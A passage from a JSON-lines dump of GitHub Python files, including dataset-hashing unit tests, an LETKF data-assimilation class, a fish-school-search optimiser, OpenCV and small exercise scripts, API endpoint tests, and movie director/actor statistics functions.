_create_code(*[getattr(code, k) if k != \"co_filename\" else co_filename for k in code_args])\n return FunctionType(code, func.__globals__, func.__name__, func.__defaults__, func.__closure__)\n\n co_filename, returned_obj = \"\", [0]\n hash1 = md5(datasets.utils.py_utils.dumps(create_ipython_func(co_filename, returned_obj))).hexdigest()\n co_filename, returned_obj = \"\", [1]\n hash2 = md5(datasets.utils.py_utils.dumps(create_ipython_func(co_filename, returned_obj))).hexdigest()\n co_filename, returned_obj = \"\", [0]\n hash3 = md5(datasets.utils.py_utils.dumps(create_ipython_func(co_filename, returned_obj))).hexdigest()\n self.assertEqual(hash1, hash3)\n self.assertNotEqual(hash1, hash2)\n\n def test_recurse_dump_for_function_with_shuffled_globals(self):\n foo, bar = [0], [1]\n\n def func():\n return foo, bar\n\n func.__module__ = \"__main__\"\n\n def globalvars_mock1_side_effect(func, *args, **kwargs):\n return {\"foo\": foo, \"bar\": bar}\n\n def globalvars_mock2_side_effect(func, *args, **kwargs):\n return {\"bar\": bar, \"foo\": foo}\n\n with patch(\"dill.detect.globalvars\", side_effect=globalvars_mock1_side_effect) as globalvars_mock1:\n hash1 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertGreater(globalvars_mock1.call_count, 0)\n with patch(\"dill.detect.globalvars\", side_effect=globalvars_mock2_side_effect) as globalvars_mock2:\n hash2 = md5(datasets.utils.py_utils.dumps(func)).hexdigest()\n self.assertGreater(globalvars_mock2.call_count, 0)\n self.assertEqual(hash1, hash2)\n\n\nclass HashingTest(TestCase):\n def test_hash_simple(self):\n hash1 = Hasher.hash(\"hello\")\n hash2 = Hasher.hash(\"hello\")\n hash3 = Hasher.hash(\"there\")\n self.assertEqual(hash1, hash2)\n self.assertNotEqual(hash1, hash3)\n\n def test_hash_class_instance(self):\n hash1 = Hasher.hash(Foo(\"hello\"))\n hash2 = Hasher.hash(Foo(\"hello\"))\n hash3 = Hasher.hash(Foo(\"there\"))\n self.assertEqual(hash1, hash2)\n self.assertNotEqual(hash1, hash3)\n\n def test_hash_update(self):\n hasher = Hasher()\n for x in [\"hello\", Foo(\"hello\")]:\n hasher.update(x)\n hash1 = hasher.hexdigest()\n hasher = Hasher()\n for x in [\"hello\", Foo(\"hello\")]:\n hasher.update(x)\n hash2 = hasher.hexdigest()\n hasher = Hasher()\n for x in [\"there\", Foo(\"there\")]:\n hasher.update(x)\n hash3 = hasher.hexdigest()\n self.assertEqual(hash1, hash2)\n self.assertNotEqual(hash1, hash3)\n\n def test_hash_unpicklable(self):\n with self.assertRaises(pickle.PicklingError):\n Hasher.hash(UnpicklableCallable(Foo(\"hello\")))\n\n def test_hash_same_strings(self):\n string = \"abc\"\n obj1 = [string, string] # two strings have the same ids\n obj2 = [string, string]\n obj3 = json.loads(f'[\"{string}\", \"{string}\"]') # two strings have different ids\n self.assertIs(obj1[0], string)\n self.assertIs(obj1[0], obj1[1])\n self.assertIs(obj2[0], string)\n self.assertIs(obj2[0], obj2[1])\n self.assertIsNot(obj3[0], string)\n self.assertIsNot(obj3[0], obj3[1])\n hash1 = Hasher.hash(obj1)\n hash2 = Hasher.hash(obj2)\n hash3 = Hasher.hash(obj3)\n self.assertEqual(hash1, hash2)\n self.assertEqual(hash1, hash3)\n\n\n@pytest.mark.integration\ndef test_move_script_doesnt_change_hash(tmp_path: Path):\n dir1 = tmp_path / \"dir1\"\n dir2 = tmp_path / \"dir2\"\n dir1.mkdir()\n dir2.mkdir()\n script_filename = \"script.py\"\n code = dedent(\n \"\"\"\n from datasets.fingerprint import Hasher\n def foo():\n pass\n print(Hasher.hash(foo))\n \"\"\"\n )\n script_path1 = dir1 / script_filename\n script_path2 = dir2 / script_filename\n with script_path1.open(\"w\") as f:\n f.write(code)\n with script_path2.open(\"w\") as f:\n f.write(code)\n fingerprint1 = subprocess.check_output([\"python\", str(script_path1)])\n fingerprint2 = subprocess.check_output([\"python\", str(script_path2)])\n assert fingerprint1 == fingerprint2\n\n\ndef test_fingerprint_in_multiprocessing():\n data = {\"a\": [0, 1, 2]}\n dataset = DatasetChild(InMemoryTable.from_pydict(data))\n expected_fingerprint = dataset.func1()._fingerprint\n assert expected_fingerprint == dataset.func1()._fingerprint\n assert expected_fingerprint != dataset.func2()._fingerprint\n\n with Pool(2) as p:\n assert expected_fingerprint == p.apply_async(dataset.func1).get()._fingerprint\n assert expected_fingerprint != p.apply_async(dataset.func2).get()._fingerprint\n\n\ndef test_fingerprint_when_transform_version_changes():\n data = {\"a\": [0, 1, 2]}\n\n class DummyDatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False)\n def func(self, new_fingerprint):\n return DummyDatasetChild(self.data, fingerprint=new_fingerprint)\n\n fingeprint_no_version = DummyDatasetChild(InMemoryTable.from_pydict(data)).func()\n\n class DummyDatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False, version=\"1.0.0\")\n def func(self, new_fingerprint):\n return DummyDatasetChild(self.data, fingerprint=new_fingerprint)\n\n fingeprint_1 = DummyDatasetChild(InMemoryTable.from_pydict(data)).func()\n\n class DummyDatasetChild(datasets.Dataset):\n @fingerprint_transform(inplace=False, version=\"2.0.0\")\n def func(self, new_fingerprint):\n return DummyDatasetChild(self.data, fingerprint=new_fingerprint)\n\n fingeprint_2 = DummyDatasetChild(InMemoryTable.from_pydict(data)).func()\n\n assert len({fingeprint_no_version, fingeprint_1, fingeprint_2}) == 3\n\n\ndef test_dependency_on_dill():\n # AttributeError: module 'dill._dill' has no attribute 'stack'\n hasher = Hasher()\n hasher.update(lambda x: x)\n","repo_name":"chrisjihee/CrossKorean-22.10","sub_path":"lib/datasets/tests/test_fingerprint.py","file_name":"test_fingerprint.py","file_ext":"py","file_size_in_byte":13125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"11854805716","text":"import logging\nimport abc\nfrom typing import Union, Iterable, List, Callable\n\n# External modules\nimport xarray as xr\nimport numpy as np\nimport torch\nimport torch.nn\n\n# Internal modules\nfrom .etkf import ETKF\nfrom .mixin_local import DomainLocalizedMixin\nfrom ..transform.base import BaseTransformer\nfrom ..localization.localization import BaseLocalization\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass LETKF(DomainLocalizedMixin, ETKF):\n \"\"\"\n This is an implementation of the `localized ensemble transform Kalman\n filter` :cite:`hunt_efficient_2007`.\n This is a localized version of the `ensemble transform Kalman filter`\n :cite:`bishop_adaptive_2001`. This method iterates independently over each\n grid point in given background state. Given localization instance can be\n used to\n constrain the influence of observations in space. The ensemble weights are\n calculated for every grid point and independently applied to every grid\n point. This implementation follows :cite:`hunt_efficient_2007`, with local\n weight estimation and is implemented in PyTorch. This implementation allows\n filtering in time based on linear propagation assumption\n :cite:`hunt_four-dimensional_2004` and ensemble smoothing.\n\n Parameters\n ----------\n localization : obj or None, optional\n This localization is used to localize and constrain observations\n spatially. If this localization is None, no localization is applied such\n it is an inefficient version of the `ensemble transform Kalman filter`.\n Default value is None, indicating no localization at all.\n smoother : bool, optional\n Indicates if this filter should be run in smoothing or in filtering\n mode. In smoothing mode, no analysis time is selected from given state\n and the ensemble weights are applied to the whole state. In filtering\n mode, the weights are applied only on selected analysis time. Default\n is False, indicating filtering mode.\n inf_factor : float, optional\n Multiplicative inflation factor :math:`\\\\rho``, which is applied to the\n background precision. An inflation factor greater one increases the\n ensemble spread, while a factor less one decreases the spread. Default\n is 1.0, which is the same as no inflation at all.\n gpu : bool, optional\n Indicator if the weight estimation should be done on either GPU (True)\n or CPU (False): Default is None. For small models, estimation of the\n weights on CPU is faster than on GPU!.\n \"\"\"\n def __init__(\n self,\n localization: Union[None, BaseLocalization] = None,\n inf_factor: Union[float, torch.Tensor, torch.nn.Parameter] = 1.0,\n smoother: bool = False,\n gpu: bool = False,\n pre_transform: Union[None, Iterable[BaseTransformer]] = None,\n post_transform: Union[None, Iterable[BaseTransformer]] = None,\n chunksize: int = 10,\n weight_save_path: Union[None, str] = None,\n forward_model: Union[None, Callable] = None\n ):\n super().__init__(\n inf_factor=inf_factor, smoother=smoother, gpu=gpu,\n pre_transform=pre_transform,\n post_transform=post_transform,\n weight_save_path=weight_save_path,\n forward_model=forward_model\n )\n self.localization = localization\n self.chunksize = chunksize\n\n def __str__(self):\n return 'Localized ETKF(inf_factor={0}, loc={1})'.format(\n str(self.inf_factor.item()), str(self.localization)\n )\n\n def __repr__(self):\n return 'LETKF({0},{1})'.format(\n repr(self.inf_factor.item()), repr(self.localization)\n )\n\n def estimate_weights(\n self,\n state: xr.DataArray,\n filtered_obs: List[xr.Dataset],\n ens_obs: List[xr.DataArray]\n ) -> xr.DataArray:\n innovations, ens_obs_perts = self._get_obs_space_variables(\n ens_obs, filtered_obs\n )\n logger.info('Got normalized data in observational space')\n\n obs_info = self._extract_obs_information(innovations)\n logger.info('Extracted observation grid information')\n logger.debug('Obs info: {0}'.format(obs_info))\n grid_index, state_info = self._extract_state_information(state)\n logger.info('Extracted grid information about the state id')\n logger.debug('State_id: {0}'.format(state_info))\n state_info = state_info.chunk({'grid': self.chunksize, \"id_names\": -1})\n ens_obs_perts = ens_obs_perts.chunk({'ensemble': -1, \"obs_id\": -1})\n innovations = innovations.chunk({\"obs_id\": -1})\n\n logger.info('Chunked the state information')\n\n weights = xr.apply_ufunc(\n self.localized_module,\n state_info,\n ens_obs_perts,\n innovations,\n input_core_dims=[['id_names'], ['ensemble', 'obs_id'], ['obs_id']],\n vectorize=True,\n dask='parallelized',\n output_core_dims=[['ensemble', 'ensemble_new']],\n output_dtypes=[float],\n dask_gufunc_kwargs=dict(\n output_sizes={'ensemble_new': len(ens_obs_perts['ensemble'])}\n ),\n kwargs={\n 'obs_info': obs_info,\n }\n )\n logger.info('Estimated the weights')\n weights = weights.assign_coords(grid=grid_index)\n weights['ensemble_new'] = weights.indexes['ensemble']\n logger.info('Post-processed the weights')\n return weights\n","repo_name":"tobifinn/torch-assimilate","sub_path":"pytassim/interface/letkf.py","file_name":"letkf.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"14394980830","text":"n=int(input())\ne=[]\no=[]\nwhile n>0:\n r=n%10\n if r%2==0:\n e.append(r)\n else:\n o.append(r)\n n=n//10\nif len(e)>0 and len(o)==0:\n print(\"Even\")\nelif len(o)>0 and len(e)==0:\n print(\"Odd\")\nelse:\n print(\"Mixed\")","repo_name":"SairamTalisetti/codemind-python","sub_path":"Even_Odd_Mixed.py","file_name":"Even_Odd_Mixed.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74328334405","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nfrom random import uniform\nfrom math import fabs\nfrom math import cos\nfrom math import pi\nfrom objectiveFunc import *\n\nDEBUG = False\nINTERATIONS = 10000\nALFA= 0.01\nC = 0.1\nSTEP_IND=0.1\n\n\nMINIMUM_C = 0.001\nMAXIMUM_C = 0.999\n\n\nMIN_WEIGHT = 1\nMAX_WEIGHT = 1000\n\nclass FSSII():\n def __init__(self, number_fishes, beta , problem):\n self.number_fishes = number_fishes\n self.max_iteration = INTERATIONS\n self.problem = problem\n self._fishes = []\n self.best_fish = None\n self.beta = beta\n self.fitness_best_fish = 0\n self.c = C\n\n for nparticle in range(number_fishes):\n fish = FishII(nparticle, self.beta, problem)\n# fish.update_fitness()\n self._fishes.append(fish)\n\n def run(self):\n higher_delta_fitness = 0\n it = 1\n prev_count_fish = curr_count_fish=0\n alfa = - ALFA\n #Local Search\n for _, fish in enumerate(self._fishes):\n fish.individual_movement(it)\n if (fish.delta_fitness > higher_delta_fitness):\n higher_delta_fitness = (fish.delta_fitness)\n\n #Alimentacao\n for fish in self._fishes:\n fish.calculate_weight_I(higher_delta_fitness)\n if (fish.delta_w > 0):\n curr_count_fish +=1\n\n prev_count_fish = curr_count_fish\n history = []\n while it < INTERATIONS:\n higher_delta_fitness = 0\n curr_count_fish = 0\n sum_delta_w = 0\n\n# self.c = C * ( 1 + alfa)\n self.c += self.c * alfa\n\n if self.c < MINIMUM_C:\n self.c = MINIMUM_C\n elif self.c > MAXIMUM_C:\n self.c = MAXIMUM_C\n\n for _, fish in enumerate(self._fishes):\n fish.fish_displacement()\n fish.fitness_variation()\n\n if (fish.delta_fitness > higher_delta_fitness):\n higher_delta_fitness = fish.delta_fitness\n\n fish.calculate_weight_II(higher_delta_fitness)\n sum_delta_w += fish.delta_w\n if (fish.delta_w > 0):\n curr_count_fish +=1\n\n barycentre = self._calculate_barycentre()\n instintive_collective = self._calculate_instintive_collective()\n for fish in self._fishes:\n volitive_collective = fish.calculate_volitive_collective(sum_delta_w, barycentre, self.c)\n fish.update_position(instintive_collective, volitive_collective, self.c)\n\n if (fish.current_fitness > self.fitness_best_fish):\n print ('Modificando o melhor fitness')\n self.fitness_best_fish = fish.current_fitness\n self.best_fish = fish\n\n \"\"\"\n print fish.label\n print 'prev position', fish.prev_position\n print 'curr position', fish.current_position\n print 'delta_x', fish.delta_x\n print 'delta_w', fish.delta_w\n print 'delta_f', fish.delta_fitness\n \"\"\"\n if curr_count_fish < prev_count_fish:\n alfa *= -1\n\n prev_count_fish = curr_count_fish\n\n print ('Iteracao: %d' % it)\n #print \"*******************************************************\"\n print (self.best_fish)\n line = (\"%.15f\\n\" % (self.best_fish.current_fitness))\n history.append(line)\n# print \"*******************************************************\"\n it+=1\n if (self.best_fish.current_fitness == float('inf')):\n break\n return history\n\n def _calculate_instintive_collective(self):\n instintive_collective = [0] * self.problem.dimensions\n sum_prod = [0] * self.problem.dimensions\n sum_weight_now = 0\n\n for fish in self._fishes:\n for pos, _ in enumerate(fish.delta_x):\n sum_prod[pos] += fish.delta_x[pos] * fish.weigth\n sum_weight_now += fish.weigth\n\n constant = self.c * uniform(0,1)\n for pos, _ in enumerate(sum_prod):\n instintive_collective[pos] = constant * (sum_prod[pos]/sum_weight_now)\n\n return instintive_collective\n\n def _calculate_barycentre(self):\n school_barycentre = [0] * self.problem.dimensions\n sum_prod = [0] * self.problem.dimensions\n sum_weight_now = 0\n\n for fish in self._fishes:\n for pos,value in enumerate(fish.current_position):\n sum_prod[pos] += fish.current_position[pos] * fish.weigth\n sum_weight_now += fish.weigth\n\n for pos,value in enumerate(sum_prod):\n school_barycentre[pos] = value / sum_weight_now\n\n return school_barycentre\n\n def __str__(self):\n result=''\n for fish in self._fishes:\n result+=str(fish)\n return result\n\nclass FishII():\n def __init__(self, label, beta, problem):\n self.label = label\n self.problem = problem\n self.current_position =[]\n self.beta = beta\n\n if (not self.current_position):\n while len(self.current_position) < self.problem.dimensions:\n value = uniform(self.problem.pMin, self.problem.pMax)\n self.current_position.append(value)\n\n self.neighbor_position = self.current_position[:]\n self.prev_position = self.current_position[:]\n self.prev_fitness = self.neighbor_fitness = self.current_fitness = self.calculate_fitness(self.current_position)\n\n print (self.current_position)\n self.weigth = uniform(300,600); # All the fish are born with weight like that\n\n self.old_weigth = self.weigth\n self.delta_x = len(self.neighbor_position) * [0]\n\n\n def calculate_weight_I(self, delta_fitness_max):\n\n if delta_fitness_max != 0:\n fitness_gain_normalized = (self.delta_fitness * 1.0) / delta_fitness_max\n new_weigth = self.weigth + fitness_gain_normalized\n\n if (new_weigth > MAX_WEIGHT):\n new_weigth = MAX_WEIGHT\n if (new_weigth < MIN_WEIGHT):\n new_weigth = MIN_WEIGHT\n\n\n self.old_weigth = self.weigth\n self.weigth = new_weigth\n\n self.delta_w = self.weigth - self.old_weigth\n\n def calculate_fitness(self, positions):\n value = self.problem.evaluate(positions)\n \n #trabalhando como se fosse uma maximixação\n if value == 0: \n return float('inf')\n else:\n return 1/value\n\n def individual_movement(self, iteration, step_size=0.1):\n pos = 0\n self.neighbor_position = self.current_position[:]\n\n while pos < len(self.neighbor_position):\n self.delta_x[pos] = uniform(-1, 1) * STEP_IND\n pos+=1\n\n pos = 0\n while pos < len(self.neighbor_position):\n\n self.neighbor_position[pos] = self.neighbor_position[pos] + self.delta_x[pos]\n\n if (self.neighbor_position[pos] < self.problem.pMin):\n self.neighbor_position[pos] = self.problem.pMin\n if (self.neighbor_position[pos] > self.problem.pMax):\n self.neighbor_position[pos] = self.problem.pMax\n pos+=1\n\n self.neighbor_fitness = self.calculate_fitness(self.neighbor_position)\n\n #if self.neighbor_fitness > self.current_fitness:\n self.prev_fitness = self.current_fitness\n self.prev_position = self.current_position[:]\n self.current_fitness = self.neighbor_fitness\n self.current_position = self.neighbor_position[:]\n\n self.delta_fitness = self.current_fitness - self.prev_fitness\n\n def fish_displacement(self):\n self.delta_x = [0] * len(self.current_position)\n for pos, _ in enumerate(self.delta_x):\n self.delta_x[pos] = self.current_position[pos] - self.prev_position[pos]\n\n def fitness_variation(self):\n self.delta_fitness = self.current_fitness - self.prev_fitness\n\n def calculate_weight_II(self, max_delta_fitness):\n\n if max_delta_fitness == 0:\n max_delta_fitness = 1\n\n new_weigth = self.weigth + self.delta_fitness/max_delta_fitness\n self.old_weigth = self.weigth\n self.weigth = new_weigth\n self.delta_w = self.weigth - self.old_weigth\n\n def update_position(self, instintive_collective, volitive_collective, c):\n prod_delta_x = [0] * len(self.delta_x)\n new_position = [0] * len(self.current_position)\n\n for pos, _ in enumerate(self.delta_x):\n prod_delta_x[pos] = self.beta * c * self.delta_x[pos]\n\n for pos, _ in enumerate(new_position):\n new_position[pos] = -1 * self.current_position[pos] + prod_delta_x[pos] + instintive_collective[pos] + volitive_collective[pos]\n\n if (new_position[pos] < self.problem.pMin):\n new_position[pos] = self.problem.pMin\n if (new_position[pos] > self.problem.pMax):\n new_position[pos] = self.problem.pMax\n\n new_fitness = self.calculate_fitness(new_position)\n\n #if new_fitness >= self.current_fitness:\n self.prev_position = self.current_position[:]\n self.prev_fitness = self.current_fitness\n self.current_position = new_position[:]\n self.current_fitness = new_fitness\n\n def calculate_volitive_collective(self, sum_delta_w, barycentre, c):\n volitive_collective = [0] * self.problem.dimensions\n\n if sum_delta_w >= 0:\n signal= +1\n else:\n signal= -1\n\n constant = c * uniform(0,1) * signal\n\n for pos, _ in enumerate(barycentre):\n volitive_collective[pos] = constant * (self.current_position[pos] - barycentre[pos])\n\n return volitive_collective\n\n def __str__(self):\n return \"(%02d) Current Fitness = %10.20f | Current position = %s \\n\" % (self.label, self.current_fitness, str(self.current_position))\n\nif __name__ == '__main__':\n rastrigin = Rastrign(30)\n esfera = Esfera(30)\n ackley = AckleyFunction(30)\n rosembrock = Rosembrock(30)\n\n fss = FSSII(30, 0.4, esfera)\n history=fss.run()\n convergencia = open('results_fss2_rastrigin.txt', 'w')\n convergencia.writelines(history)\n #print fss\n","repo_name":"ja1goncalves/analysis-volitive-gwo","sub_path":"Origins Algoritms/FSS2.py","file_name":"FSS2.py","file_ext":"py","file_size_in_byte":10358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4459355562","text":"import cv2\nimport datetime\nimport numpy as np\n\ncap=cv2.VideoCapture(0)\n\n##the camera will take only the available nearest resolution\ncap.set(3,1280) ## frame width\ncap.set(4,720) ## frame height\n\nwhile True:\n success,frame=cap.read()\n\n frame=cv2.flip(frame,1)\n # 0 for vertically\n # 1 for horizontally\n # -1 for both hori and verti\n\n text='Width: '+str(cap.get(3))+' Height: '+str(cap.get(4))\n datet=str(datetime.datetime.now())\n frame = cv2.putText(frame,datet, (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 233, 233), 2, cv2.LINE_AA)\n # frame = cv2.putText(frame,text,(10,30),cv2.FONT_HERSHEY_SIMPLEX,1,(0,233,233),2,cv2.LINE_AA)\n cv2.imshow('video capture',frame)\n\n if cv2.waitKey(1) & 0xFF== ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"saboo-vivek/OpenCv2","sub_path":"add text to videos.py","file_name":"add text to videos.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36375541068","text":"# 피보나치 함수\r\n\r\nimport sys\r\ninput = sys.stdin.readline \r\nsys.setrecursionlimit(1000)\r\n\r\nT = int(input())\r\n\r\ndef fibonacci(n):\r\n for i in range(2, n+1) :\r\n zero = answer[i-1][0] + answer[i-2][0]\r\n one = answer[i-1][1] + answer[i-2][1]\r\n answer.append([zero, one])\r\n \r\nfor i in range(T):\r\n n = int(input())\r\n answer = [[1,0], [0,1]]\r\n\r\n if n == 0 :\r\n print(answer[n][0], answer[n][1])\r\n elif n == 1 :\r\n print(answer[n][0], answer[n][1])\r\n else : \r\n fibonacci(n)\r\n print(answer[n][0], answer[n][1])","repo_name":"dlwlals1289/Sol_Algorithm","sub_path":"백준/Silver/1003. 피보나치 함수/피보나치 함수.py","file_name":"피보나치 함수.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20955662207","text":"import requests, random, math, unittest, logging, json\nfrom datetime import timedelta\n\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)\n\n\nhost = 'https://grogdata.soest.hawaii.edu'\n#host = 'http://192.168.0.30'\n\n\ndef test1(ep):\n \"\"\"Check that the endpoint is available, and there's no None, NaN, or inf/-inf in the response.\"\"\"\n logging.debug('Testing {}'.format(ep))\n result = True\n\n r = requests.get(ep)\n result &= r.status_code == 200\n r = r.json()\n x,y = zip(*r)\n\n def p(v):\n return v is not None and not math.isnan(v) and v not in [float('-inf'), float('inf')]\n\n result &= all([p(tmp) for tmp in x])\n result &= all([p(tmp) for tmp in y])\n return result\n\n\nclass TestAPI(unittest.TestCase):\n\n def testxy2(self):\n # tide gauges\n nodes = ['node-008',\n 'node-009',\n 'node-014',\n 'node-046',\n 'node-048',\n 'node-049',\n 'node-051',\n 'node-070',\n 'node-097',]\n\n for node in nodes:\n end = 1615178655\n begin = end - timedelta(days=7).total_seconds()\n # no longer checks if node is in site.\n ep = '/data/2/{node}/ReceptionTime,d2w.json?begin={begin}&end={end}&time_col=ReceptionTime'.\\\n format(node=node,\n begin=begin,\n end=end)\n ep = host + ep\n try:\n result = test1(ep)\n except:\n print(ep)\n result = False\n if not result:\n logging.warning('FAILED: ' + ep)\n self.assertTrue(False)\n\n def testxy3(self):\n # tide gauges\n nodes = ['node-008',\n 'node-009',\n 'node-014',\n 'node-046',\n 'node-048',\n 'node-049',\n 'node-051',\n 'node-070',\n 'node-097',]\n\n for node in nodes:\n end = 1615178655\n begin = end - timedelta(days=7).total_seconds()\n # no longer checks if node is in site.\n ep = '/data/3/{node}/ReceptionTime,d2w.json?begin={begin}&end={end}&time_col=ReceptionTime'.\\\n format(node=node,\n begin=begin,\n end=end)\n ep = host + ep\n try:\n result = test1(ep)\n except:\n print(ep)\n result = False\n if not result:\n logging.warning('FAILED: ' + ep)\n self.assertTrue(False)\n\n def testdataapiformat(self):\n # make sure there's a time_col even though it's not specified in the link\n url = host + '/data/2/node-009/ReceptionTime,d2w.json?begin=1505513530.79&end=1506118330.79&time_col=ReceptionTime'\n r = requests.get(url)\n self.assertTrue(r.status_code == 200)\n r = r.json()\n self.assertTrue(len(r) > 0)\n\n def test_no_inf(self):\n ep = '/data/2/base-005/ReceptionTime,uptime_second.json?begin=1506802303.13&end=1509394303.13&time_col=ReceptionTime'\n ep = host + ep\n logging.debug('Testing {}'.format(ep))\n self.assertTrue(test1(ep))\n r = requests.get(ep).json()\n x,y = zip(*r)\n self.assertTrue(float('inf') not in x)\n self.assertTrue(float('-inf') not in x)\n self.assertTrue(float('nan') not in x)\n self.assertTrue(float('inf') not in y)\n self.assertTrue(float('-inf') not in y)\n self.assertTrue(float('nan') not in y)\n\n def testmisc(self):\n eps = [\n '/poh/nodepage/node-004.json',\n '/poh/nodepage/node-021.json',\n #'/poh/data/node-021/PH_EXT.json?begin=1480800106&end=1480808106&max_count=5',\n #'/makaipier/data/node-010/d2w.json?begin=1480800106&end=1480808106',\n #'/poh/data/node-022/PH_EXT.json?begin=1480800106&end=1480808106&max_count=5',\n '/static/uhcm/img/poh/node-004/AirSaturation.json',\n\n '/poh/data/dashboard.json',\n #'/poh/data/meteorological.json',\n #'/poh/data/makaha/makaha1.json',\n #'/poh/data/makaha/makaha2.json',\n #'/poh/data/makaha/triplemakahab.json',\n\n #'/poh/data/location/makaha1/depth.json?minutes=10080&max_count=1000',\n #'/poh/data/location/makaha1/depth.json',\n #'/poh/data/location/makaha1/depth.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha1/depth.json?minutes=60',\n #'/poh/data/location/makaha1/depth.json?begin=1478030000&end=1478037569&max_count=1000',\n #'/poh/data/location/makaha1/oxygen.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha1/air.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha1/temperature.json?begin=1485980000&end=1485986255',\n\n #'/poh/data/location/makaha2/depth.json',\n #'/poh/data/location/makaha2/depth.json?begin=1485980000&end=1485986255',\n #'/poh/data/location/makaha2/depth.json?minutes=60',\n #'/poh/data/location/makaha2/depth.json?begin=1478030000&end=1478037569&max_count=1000',\n\n #'/makaipier/data/location/dock1/depth.json',\n #'/makaipier/data/location/dock1/depth.json?begin=1485980000&end=1485986255',\n #'/makaipier/data/location/dock1/depth.json?minutes=60',\n #'/makaipier/data/location/dock1/depth.json?begin=1478400000&end=1485900000&max_count=1000',\n ]\n\n for ep in eps:\n ep = host + ep\n logging.debug('Testing {}'.format(ep))\n code = requests.get(ep).status_code\n if code != 200:\n logging.warning(ep)\n self.assertTrue(False)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"stanleylio/cm1app","sub_path":"cm1app/tests/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"2587989788","text":"import numpy as np\nimport pandas as pd\n\ndef director_value(movie):\n \"\"\"\n input: movie (each row in all_data_df)\n output: \n - film_count: number of movies directed before the movie of interest\n - avg_rating: average rating of movies directed before the movie of interest\n - avg_gross: gross per movie before the movie of interest\n \"\"\"\n \n movie_title = movie.movie_title\n director = movie.director\n year = movie.release_date\n\n headers = ['movie_title','director','film_count_d','avg_rating_d','avg_gross_d']\n \n # Assign default values\n film_count,avg_rating,avg_gross = 0, director_rating_mean, director_gross_mean\n \n doi_df = director_df[(director_df.director == director) & (director_df.year < year)]\n \n # Fill NaN with director's mean\n doi_df[['rating','gross_usa']].apply(lambda x: x.fillna(x.mean(),axis=0))\n \n # If there's still NaN, fill with all directors' mean\n doi_df[['rating']] = doi_df[['rating']].apply(lambda x: x.fillna(director_rating_mean,axis=0))\n doi_df[['gross_usa']] = doi_df[['gross_usa']].apply(lambda x: x.fillna(director_gross_mean,axis=0))\n \n \n if doi_df.shape[0] == 0:\n film_count,avg_rating,avg_gross = 0, director_rating_mean, director_gross_mean\n else:\n \n \n \n film_count = doi_df.shape[0]\n\n \n avg_rating = doi_df['rating'].mean()\n if avg_rating == np.nan:\n avg_rating = director_rating_mean\n\n try:\n avg_gross = int(doi_df['gross_usa'].mean())\n except ValueError:\n avg_gross = director_gross_mean\n \n \n director_value = dict(zip(headers, [movie_title,director,film_count,avg_rating,avg_gross]))\n \n return director_value\n\n\n\ndef actor_value(actor,year):\n \"\"\"\n input: actor name and (release) year of the movie of interest\n output: \n - film_count: number of movies the actor was in before the movie of interest\n - avg_rating: average rating of movies the actor was in before the movie of interest\n - avg_gross: gross per movie before the movie of interest\n \"\"\"\n \n aoi_df = actor_df[(actor_df.actor == actor) & (actor_df.year.dt.year < year)].copy()\n \n # Fill NaN with actor's mean\n values={'rating':aoi_df.rating.mean(), 'gross_usa':aoi_df.gross_usa.mean()}\n aoi_df.fillna(value=values,inplace=True)\n \n # If there's still NaN, fill with all actors' mean\n values={'rating':actor_rating_mean, 'gross_usa':actor_gross_mean}\n aoi_df.fillna(value=values,inplace=True)\n \n \n # If there's no movie prior to movie of interest \n if aoi_df.shape[0] == 0:\n film_count,avg_rating,avg_gross = 0, actor_rating_mean, actor_gross_mean\n \n else:\n \n film_count = aoi_df.shape[0]\n \n avg_rating = aoi_df['rating'].mean()\n avg_gross = aoi_df['gross_usa'].mean()\n\n \n \n actor_value = [film_count, avg_rating, avg_gross]\n \n print(actor,actor_value)\n \n return actor_value,aoi_df\n\n\n\n\ndef get_cast(movie):\n \"\"\"\n input: movie (each row in all_data_df)\n output: \n - film_count: number of movies directed before the movie of interest\n - avg_rating: average rating of movies directed before the movie of interest\n - avg_gross: gross per movie before the movie of interest\n \"\"\"\n \n movie_title = movie.movie_title\n year = movie.release_year\n actors = movie.actor\n lead = actors[0]\n \n film_counts = []\n ratings = []\n grosses = []\n \n for actor in actors:\n result = actor_value(actor,year)\n film_counts.append(result[0])\n ratings.append(result[1])\n grosses.append(result[2])\n \n avg_film_count = np.mean(film_counts)\n avg_rating = np.mean(ratings)\n avg_gross = np.mean(grosses) \n \n \n lead_result = actor_value(lead,year)\n \n\n headers = ['movie_title','cast','avg_film_count_c','avg_rating_c','avg_gross_c',\\\n 'avg_film_count_l','avg_rating_l','avg_gross_l']\n\n \n \n cast_info = dict(zip(headers, [movie_title,actors,avg_film_count,avg_rating,avg_gross,\\\n lead_result[0],lead_result[1],lead_result[2]]))\n \n return 